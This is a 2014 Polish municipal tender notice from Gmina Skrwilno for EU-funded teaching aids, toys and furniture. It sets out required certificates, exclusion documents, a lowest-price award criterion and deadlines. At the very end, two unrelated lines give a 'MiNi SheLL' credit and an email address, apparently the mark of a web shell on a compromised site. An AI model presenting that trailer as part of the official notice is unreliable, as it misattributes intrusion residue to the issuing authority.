 certyfikaty na całość konstrukcji mebli, wystawione przez jednostki akredytowane; 
 deklaracje zgodności CE
 oświadczenie Wykonawcy, że oferowane pomoce dydaktyczne i zabawki zostały wykonane zgodnie z obowiązującymi przepisami, wymaganiami i normami mającymi zastosowanie do danego wyrobu, oraz posiadają oznakowanie wyrobu przez producenta symbolem Europejskiej Zgodności CE.
4.Podane w opisie nazwy własne pochodzenie, producent, itp. mają jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany w dokumentacji konkretny z nazwy lub pochodzenia produkt. Jego, jakość nie może być gorsza, od jakości określonego specyfikacji produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2, 39.11.00.00-6, 39.16.10.00-8, 39.16.21.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.skrwilno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Skrwilnie, ul. Rypińska 7, 87-510 Skrwilno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2014 godzina 12:00, miejsce: Gmina Skrwilno, ul. Rypińska 7, 87-510 Skrwilno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 11.09.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com